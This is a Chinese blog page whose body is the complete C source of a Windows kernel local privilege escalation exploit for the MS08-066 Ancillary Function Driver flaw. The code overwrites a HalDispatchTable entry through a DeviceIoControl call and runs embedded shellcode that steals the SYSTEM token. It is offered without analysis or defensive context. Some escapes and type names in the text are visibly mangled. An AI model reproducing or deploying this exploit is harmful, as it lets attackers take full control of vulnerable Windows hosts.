ms08-066

原创 于 2008-10-20 10:55:00 发布 · 1.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#basic #null #module #image #byte #system

  1. #include <stdio.h>
  2. #include <winsock2.h>
  3. #include <windows.h>
  5. #pragma comment(lib, "ws2_32.lib")
  7. #define NTSTATUS        int
  9. typedef struct _PROCESS_BASIC_INFORMATION {
  10. NTSTATUS ExitStatus;
  11. PVOID PebBaseAddress;
  12. ULONG AffinityMask;
  13. ULONG BasePriority;
  14. ULONG UniqueProcessId;
  15. ULONG InheritedFromUniqueProcessId;
  16. } PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;
  18. typedef struct _IMAGE_FIXUP_ENTRY {
  19. USHORT        Offset:12;
  20. USHORT        Type:4;
  21. } IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
  23. typedef enum _PROCESS_IMFORMATION_CLASS {
  24. ProcessBasicInformation,
  25. ProcessQuotaLimits,
  26. ProcessIoCounters,
  27. ProcessVmCounters,
  28. ProcessTimes,
  29. ProcessBasePriority,
  30. ProcessRaisePriority,
  31. ProcessDebugPort,
  32. ProcessExceptionPort,
  33. ProcessAccessToken,
  34. ProcessLdtInformation,
  35. ProcessLdtSize,
  36. ProcessDeaultHardErrorMode,
  37. ProcessIoPortHandlers,
  38. ProcessPooledUsageAndLimits,
  39. ProcessWorkingSetWatch,
  40. ProcessUserModeIOPL,
  41. ProcessEnableAlignmentFaultFixup,
  42. ProcessPriorityClass,
  43. ProcessWx86Information,
  44. ProcessHandleCount,
  45. ProcessAffinityMask,
  46. ProcessPriorityBoost,
  47. ProcessDeviceMap,
  48. ProcessSessionInformation,
  49. ProcessForegroundInformation,
  50. ProcessWow64Information
  51. } PROCESS_INFORMATION_CLASS;
  53. typedef enum _SYSTEM_INFORMATION_CLASS {
  54. SystemBasicInformation,
  55. SystemProcessorInformation,
  56. SystemPerformanceInformation,
  57. SystemTimeOfDayInformation,
  58. SystemNotImplemented1,
  59. SystemProcessesAndThreadsInformation,
  60. SystemCallCounts,
  61. SystemConfigurationInformation,
  62. SystemProcessorTimes,
  63. SystemGlobalFlag,
  64. SystemNotImplemented2,
  65. SystemModuleInformation,
  66. SystemLockInformation,
  67. SystemNotImplemented3,
  68. SystemNotImplemented4,
  69. SystemNotImplemented5,
  70. SystemHandleInformation,
  71. SystemObjectInformation,
  72. SystemPagefileInformation,
  73. SystemInstructioEmulationCounts,
  74. SystemInvalidInfoClass1,
  75. SystemCacheInformation,
  76. SystemPoolTagInformation,
  77. SystemProcessorStatistics,
  78. SystemDpcInformation,
  79. SystemNotImplemented6,
  80. SystemLoadImage,
  81. SystemUnloadImage,
  82. SystemTimeAdjustment,
  83. SystemNotImplemented7,
  84. SystemNotImplemented8,
  85. SystemNotImplemented9,
  86. SystemCrashDumpInformation,
  87. SystemExceptionInformation,
  88. SystemCrashDumpStateInformation,
  89. SystemKernelDebuggerInformation,
  90. SystemContextSwitchInformation,
  91. SystemRegisterQuotaInformation,
  92. SystemLoadAndCallImage,
  93. SystemPrioritySeparation
  94. } SYSTEM_INFORMATION_CLASS;
  96. typedef enum _KPROFILE_SOURCE {
  97. ProfileTime,
  98. ProfileAlignmentFixup,
  99. ProfileTotalIssues,
  100. ProfilePipelineDry,
  101. ProfileLoadInstructions,
  102. ProfilePipelineFrozen,
  103. ProfileBranchInstructions,
  104. ProfileTotalNonissues,
  105. ProfileDcacheMisses,
  106. ProfileIcacheMisses,
  107. ProfileCacheMisses,
  108. ProfileBranchMispredictions,
  109. ProfileStoreInstructions,
  110. ProfileFpInstructions,
  111. ProfileIntegerInstructions,
  112. Profile2Issue,
  113. Profile3Issue,
  114. Profile4Issue,
  115. ProfileSpecialInstructions,
  116. ProfileTotalCycles,
  117. ProfileIcacheIssues,
  118. ProfileDcacheAccesses,
  119. ProfileMemoryBarrierCycles,
  120. ProfileLoadLinkedIssues,
  121. ProfileMaximum
  122. } KPROFILE_SOURCE, *PKPROFILE_SOURCE;
  124. typedef struct _UNICODE_STRING {
  125. USHORT        Length;
  126. USHORT        MaximumLength;
  127. PWSTR        Buffer;
  128. } UNICODE_STRING, *PUNICODE_STRING;
  130. typedef struct _SECTION_BASIC_INFORMATION {
  131. PVOID BaseAddress;
  132. ULONG Attributes;
  133. LARGE_INTEGER Size;
  134. }SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;
  136. typedef struct _SYSTEM_MODULE_INFORMATION {
  137. ULONG Reserved[2];
  138. PVOID Base;
  139. ULONG Size;
  140. ULONG Flags;
  141. USHORT Index;
  142. USHORT Unknown;
  143. USHORT LoadCount;
  144. USHORT ModuleNameOffset;
  145. CHAR ImageName[256];
  146. } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
  148. typedef NTSTATUS (NTAPI *ZWQUERYINTERNALPROFILE)(ULONGPULONG);
  149. typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(HANDLEULONGPVOIDULONGPULONG);
  150. typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)(ULONGPVOIDULONGPULONG);
  151. typedef NTSTATUS (NTAPI *ZWALLOCATEVIRTUALMEMORY)(HANDLEPVOID *, ULONGPULONGULONGULONG);
  152. typedef PIMAGE_NT_HEADERS (NTAPI *RTLIMAGENTHEADER)(PVOID);
  153. typedef PVOID (NTAPI *RTLIMAGEDIRECTORYENTRYTODATA)(PVOIDULONGUSHORTPULONG);
  155. ZWQUERYINTERNALPROFILE        ZwQueryIntervalProfile;
  156. ZWQUERYINFORMATIONPROCESS        ZwQueryInformationProcess;
  157. ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
  158. ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory;
  159. RTLIMAGENTHEADER RtlImageNtHeader;
  160. RTLIMAGEDIRECTORYENTRYTODATA RtlImageDirectoryEntryToData;
  162. unsigned char kfunctions[64][64] =
  163. {
  164. //ntoskrnl.exe
  165. {"ZwTerminateProcess"},
  166. {"PsLookupProcessByProcessId"},
  167. {""},
  168. };
  170. unsigned char shellcode[] =
  171. "/x90/x60/x9c/xe9/xc4/x00/x00/x00/x5f/x4f/x47/x66/x81/x3f/x90/xcc"
  172. "/x75/xf8/x66/x81/x7f/x02/xcc/x90/x75/xf0/x83/xc7/x04/x64/x8b/x35"
  173. "/x38/x00/x00/x00/xad/xad/x48/x81/x38/x4d/x5a/x90/x00/x75/xf7/x95"
  174. "/x8b/xf7/x6a/x02/x59/xe8/x4d/x00/x00/x00/xe2/xf9/x8b/x4e/x0c/xe8"
  175. "/x29/x00/x00/x00/x50/x8b/x4e/x08/xe8/x20/x00/x00/x00/x5a/x8b/x7e"
  176. "/x1c/x8b/x0c/x3a/x89/x0c/x38/x56/x8b/x7e/x14/x8b/x4e/x18/x8b/x76"
  177. "/x10/xf3/xa4/x5e/x33/xc0/x50/x50/xff/x16/x9d/x61/xc3/x83/xec/x04"
  178. "/x8d/x2c/x24/x55/x51/xff/x56/x04/x85/xc0/x0f/x85/x80/x8f/x00/x00"
  179. "/x8b/x45/x00/x83/xc4/x04/xc3/x51/x56/x8b/x75/x3c/x8b/x74/x2e/x78"
  180. "/x03/xf5/x56/x8b/x76/x20/x03/xf5/x33/xc9/x49/x41/xad/x03/xc5/x33"
  181. "/xdb/x0f/xbe/x10/x85/xd2/x74/x08/xc1/xcb/x07/x03/xda/x40/xeb/xf1"
  182. "/x3b/x1f/x75/xe7/x5e/x8b/x5e/x24/x03/xdd/x66/x8b/x0c/x4b/x8b/x5e"
  183. "/x1c/x03/xdd/x8b/x04/x8b/x03/xc5/xab/x5e/x59/xc3/xe8/x37/xff/xff"
  184. "/xff/x90/x90/x90"
  186. "/x90/xcc/xcc/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
  187. "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
  188. "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/xcc/x90/x90/xcc";
  190. void ErrorQuit(pMsg)
  191. {
  192. printf("%sError Code:%d/n", pMsg, GetLastError());
  193. ExitProcess(0);
  194. }
  196. ULONG ComputeHash(char *ch)
  197. {
  198. ULONG ret = 0;
  200. while(*ch)
  201. {
  202. ret = ((ret << 25) | (ret >> 7)) + *ch++;
  203. }
  205. return ret;
  206. }
  208. void GetFunction()
  209. {
  210. HANDLE        hNtdll;
  212. hNtdll = LoadLibrary("ntdll.dll");
  213. if(hNtdll == NULL)
  214. ErrorQuit("LoadLibrary failed./n");
  216. ZwQueryIntervalProfile = (ZWQUERYINTERNALPROFILE)GetProcAddress(hNtdll, "ZwQueryIntervalProfile");
  217. if(ZwQueryIntervalProfile == NULL)
  218. ErrorQuit("GetProcAddress failed./n");
  220. ZwQueryInformationProcess = (ZWQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, "ZwQueryInformationProcess");
  221. if(ZwQueryInformationProcess == NULL)
  222. ErrorQuit("GetProcAddress failed./n");
  224. ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
  225. if(ZwQuerySystemInformation == NULL)
  226. ErrorQuit("GetProcessAddress failed./n");
  228. ZwAllocateVirtualMemory = (ZWALLOCATEVIRTUALMEMORY)GetProcAddress(hNtdll, "ZwAllocateVirtualMemory");
  229. if(ZwAllocateVirtualMemory == NULL)
  230. ErrorQuit("GetProcAddress failed./n");
  232. RtlImageNtHeader = (RTLIMAGENTHEADER)GetProcAddress(hNtdll, "RtlImageNtHeader");
  233. if(RtlImageNtHeader == NULL)
  234. ErrorQuit("GetProcAddress failed./n");
  236. RtlImageDirectoryEntryToData = (RTLIMAGEDIRECTORYENTRYTODATA)GetProcAddress(hNtdll, "RtlImageDirectoryEntryToData");
  237. if(RtlImageDirectoryEntryToData == NULL)
  238. ErrorQuit("GetProcAddress failed./n");
  240. FreeLibrary(hNtdll);
  241. }
  243. ULONG GetKernelBase(char *KernelName)
  244. {
  245. ULONG        i, Byte, ModuleCount, KernelBase;
  246. PVOID        pBuffer;
  247. PSYSTEM_MODULE_INFORMATION        pSystemModuleInformation;
  248. PCHAR        pName;
  250. ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
  252. if((pBuffer = malloc(Byte)) == NULL)
  253. ErrorQuit("malloc failed./n");
  255. if(ZwQuerySystemInformation(SystemModuleInformation, pBuffer, Byte, &Byte))
  256. ErrorQuit("ZwQuerySystemInformation failed/n");
  258. ModuleCount = *(PULONG)pBuffer;
  259. pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)pBuffer + sizeof(ULONG));
  260. for(i = 0; i < ModuleCount; i++)
  261. {
  262. if((pName = strstr(pSystemModuleInformation->ImageName, "ntoskrnl.exe")) != NULL)
  263. {
  264. KernelBase = (ULONG)pSystemModuleInformation->Base;
  265. printf("Kernel is %s/n", pSystemModuleInformation->ImageName);
  266. free(pBuffer);
  267. strcpy(KernelName, "ntoskrnl.exe");
  269. return KernelBase;
  270. }
  272. if((pName = strstr(pSystemModuleInformation->ImageName, "ntkrnlpa.exe")) != NULL)
  273. {
  274. KernelBase = (ULONG)pSystemModuleInformation->Base;
  275. printf("Kernel is %s/n", pSystemModuleInformation->ImageName);
  276. free(pBuffer);
  277. strcpy(KernelName, "ntkrnlpa.exe");
  279. return KernelBase;
  280. }
  282. pSystemModuleInformation++;
  283. }
  285. free(pBuffer);
  286. return 0;
  287. }
  289. ULONG GetServiceTable(PVOID pImageBase, ULONG Address)
  290. {
  291. PIMAGE_NT_HEADERS        pNtHeaders;
  292. PIMAGE_BASE_RELOCATION        pBaseRelocation;
  293. PIMAGE_FIXUP_ENTRY        pFixupEntry;
  294. ULONG        RelocationTableSize = 0;
  295. ULONG        Offset, i, VirtualAddress, Rva;
  297. Offset = Address - (ULONG)pImageBase;
  298. pNtHeaders = (PIMAGE_NT_HEADERS)RtlImageNtHeader(pImageBase);
  299. pBaseRelocation = (PIMAGE_BASE_RELOCATION)RtlImageDirectoryEntryToData(pImageBase, TRUE, IMAGE_DIRECTORY_ENTRY_BASERELOC, &RelocationTableSize);
  300. if(pBaseRelocation == NULL)
  301. return 0;
  303. do
  304. {
  305. pFixupEntry = (PIMAGE_FIXUP_ENTRY)((ULONG)pBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));
  307. RelocationTableSize = (pBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1;
  308. for(i = 0; i < RelocationTableSize; i++, pFixupEntry++)
  309. {
  310. if(pFixupEntry->Type == IMAGE_REL_BASED_HIGHLOW)
  311. {
  312. VirtualAddress = pBaseRelocation->VirtualAddress + pFixupEntry->Offset;
  313. Rva = *(PULONG)((ULONG)pImageBase + VirtualAddress) - (ULONG)pNtHeaders->OptionalHeader.ImageBase;
  315. if(Rva == Offset)
  316. {
  317. if (*(PUSHORT)((ULONG)pImageBase + VirtualAddress - 2) == 0x05c7)
  318. return *(PULONG)((ULONG)pImageBase + VirtualAddress + 4) - pNtHeaders->OptionalHeader.ImageBase;
  319. }
  320. }
  321. }
  323. *(PULONG)&pBaseRelocation += pBaseRelocation->SizeOfBlock;
  325. while(pBaseRelocation->VirtualAddress);
  327. return 0;
  328. }
  330. int main(int argc, char* argv[])
  331. {
  332. PVOID                pDrivers[256];
  333. PVOID                pOldKernelInfo, pMapAddress = NULL;
  334. PULONG        pStoreBuffer, pShellcode, pFakeKernelInfo;
  335. PUCHAR        pRestoreBuffer, pBase, FunctionAddress;
  336. PROCESS_BASIC_INFORMATION pbi;
  337. SYSTEM_MODULE_INFORMATION        smi;
  338. SECTION_BASIC_INFORMATION sbi;
  339. KPROFILE_SOURCE        ProfileSource;
  340. OSVERSIONINFO        ovi;
  341. char                DriverName[256], KernelName[64];
  342. ULONG                Byte, len, i, j, k, BaseAddress, Value, KernelBase, buf[64];
  343. ULONG                HookAddress, SystemId, TokenOffset, Sections, Pid, FunctionNumber;
  344. ULONG                HDTOffset, AllocationSize;
  345. ULONG                Result;
  346. HANDLE        hKernel;
  347. WSADATA        wsad;
  348. int                sockfd;
  349. struct sockaddr_in saddr;
  351. printf("/n MS08-0xx Windows Kernel Ancillary Function Driver Local Privilege Escalation Vulnerability Exploit /n/n");
  352. printf("/t Create by SoBeIt. /n/n");
  353. if(argc != 1)
  354. {
  355. printf(" Usage:%s/n/n", argv[0]);
  356. return 1;
  357. }
  359. pFakeKernelInfo = (PULONG)malloc(256);
  361. GetFunction();
  363. if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL))
  364. ErrorQuit("ZwQueryInformationProcess failed/n");
  366. KernelBase = GetKernelBase(KernelName);
  367. if(!KernelBase)
  368. ErrorQuit("Unable to get kernel base address./n");
  370. printf("Kernel base address: %x/n", KernelBase);
  372. ovi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
  374. if(!GetVersionEx(&ovi))
  375. ErrorQuit("GetVersionEx failed./n");
  377. if(ovi.dwMajorVersion != 5 && ovi.dwMajorVersion != 6)
  378. ErrorQuit("Not Windows NT family OS./n");
  380. printf("Major Version:%d Minor Version:%d/n", ovi.dwMajorVersion, ovi.dwMinorVersion);
  381. switch(ovi.dwMinorVersion)
  382. {
  383. case 0:                                                //Windows2000
  384. SystemId = 8;
  385. TokenOffset = 0x12c;
  386. break;
  388. case 1:                                                //WindowsXP
  389. SystemId = 4;
  390. TokenOffset = 0xc8;
  391. break;
  393. case 2:                                                //Windows2003
  394. SystemId = 4;
  395. TokenOffset = 0xd8;
  396. break;
  398. default:
  399. SystemId = 4;
  400. TokenOffset = 0xc8;
  401. }
  403. hKernel = LoadLibrary(KernelName);
  404. if(hKernel == NULL)
  405. ErrorQuit("LoadLibrary failed./n");
  407. printf("Load Base:%x/n", (ULONG)hKernel);
  408. HDTOffset = (ULONG)GetProcAddress(hKernel, "HalDispatchTable");
  409. HDTOffset += KernelBase - (ULONG)hKernel;
  410. printf("HalDispatchTable Offset:%x/n", HDTOffset);
  411. HookAddress = (ULONG)(HDTOffset + 4);
  412. printf("NtQueryIntervalProfile function entry address:%x/n", HookAddress);
  414. AllocationSize = 0x1000;
  415. pStoreBuffer = (PULONG)0x7fb0;
  416. if(ZwAllocateVirtualMemory((HANDLE)0xffffffff, &pStoreBuffer, 0, &AllocationSize,
  417. MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE))
  418. ErrorQuit("ZwAllocateVirtualMemory failed./n");
  420. pRestoreBuffer = malloc(0x100);
  422. memset(pStoreBuffer, 0x90, AllocationSize);
  424. pShellcode = (PULONG)shellcode;
  425. for(k = 0; pShellcode[k++] != 0x90cccc90; )
  426. ;
  428. for(j = 0; kfunctions[j][0] != '/x0'; j++)
  429. buf[j] = ComputeHash(kfunctions[j]);
  431. buf[j++] = pbi.InheritedFromUniqueProcessId;
  432. buf[j++] = SystemId;
  433. buf[j++] = (ULONG)pRestoreBuffer;
  434. buf[j++] = HookAddress;
  435. buf[j++] = 0x04;
  436. buf[j++] = TokenOffset;
  438. memcpy((char *)(pShellcode + k), (char *)buf, j * 4);
  439. memcpy((PUCHAR)0x8000, shellcode, sizeof(shellcode) - 1);
  441. if(WSAStartup(MAKEWORD(2, 2), &wsad) != 0)
  442. ErrorQuit("WSAStartup failed./n");
  444. if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
  445. ErrorQuit("socket failed./n");
  447. saddr.sin_family = AF_INET;
  448. saddr.sin_port = htons(0x1bd);
  449. saddr.sin_addr.s_addr = 0x100007f;
  451. if(connect(sockfd, (struct sockaddr *)&saddr, sizeof(struct sockaddr)))
  452. ErrorQuit("connect failed./n");
  454. DeviceIoControl((HANDLE)sockfd, 0x1203F, NULL, 0, (PVOID)(HookAddress - 3), 0, &Result, NULL);
  456. ProfileSource = ProfileTotalIssues;
  457. ZwQueryIntervalProfile(ProfileSource, &Result);
  459. printf("Exploit finished./n");
  460. return 1;
  461. }
iiprogram
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值